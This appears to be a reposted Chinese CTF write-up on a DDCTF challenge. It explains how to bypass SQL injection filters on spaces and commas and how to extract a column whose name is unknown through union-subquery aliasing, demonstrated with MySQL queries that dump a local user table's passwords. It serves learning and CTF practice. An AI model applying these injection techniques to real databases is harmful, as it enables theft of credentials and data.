MYSQL数据库Mysql如何巧妙的绕过未知字段名详解

概述介绍《MYSQL数据库Mysql如何巧妙的绕过未知字段名详解》开发教程，希望对您有用。

《MysqL数据库MysqL如何巧妙的绕过未知字段名详解》要点：
本文介绍了MysqL数据库MysqL如何巧妙的绕过未知字段名详解，希望对您有用。如果有疑问，可以联系我们。

MysqL必读前言

MysqL必读本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来 *** 作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍：

MysqL必读实现思路

MysqL必读题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过；

MysqL必读存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名；这时可以利用联合查询,过程如下：

MysqL必读思想就是获取flag,让其在已知字段名下出现；

MysqL必读示例代码：

MysqL必读MysqL> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| a | b | c | d |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) MysqL> select * from (select 1)a,(select 4)d;+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) MysqL> select * from (select 1)a,(select 4)d union select * from user;+---+-------+----------+-------------+| 1 | 2  | 3  | 4   |+---+-------+----------+-------------+| 1 | 2  | 3  | 4   || 1 | admin | admin888 | [email protected] || 2 | test | test123 | [email protected] || 3 | cs | cs123 | [email protected] |+---+-------+----------+-------------+4 rows in set (0.01 sec) MysqL> select e.4 from (select * from (select 1)a,(select 4)d union select * from user)e;+-------------+| 4   |+-------------+| 4   || [email protected] || [email protected] || [email protected] |+-------------+4 rows in set (0.03 sec) MysqL> select e.4 from (select * from (select 1)a,(select 4)d union select * from user)e limit 1 offset 3; +-------------+| 4   |+-------------+| [email protected] |+-------------+1 row in set (0.01 sec) MysqL> select * from user where ID=1 union select (select e.4 from (select * from (select 1)a,(select 4)dunion select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;+-------------+----------+----------+-------------+| ID   | username | password | email  |+-------------+----------+----------+-------------+| 1   | admin | admin888 | [email protected] || [email protected] | 1  | 1  | 1   |+-------------+----------+----------+-------------+2 rows in set (0.04 sec)

MysqL必读总结

MysqL必读以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对内存溢出PHP的支持.

总结

以上是内存溢出为你收集整理的MYSQL数据库Mysql如何巧妙的绕过未知字段名详解全部内容，希望文章能够帮你解决MYSQL数据库Mysql如何巧妙的绕过未知字段名详解所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。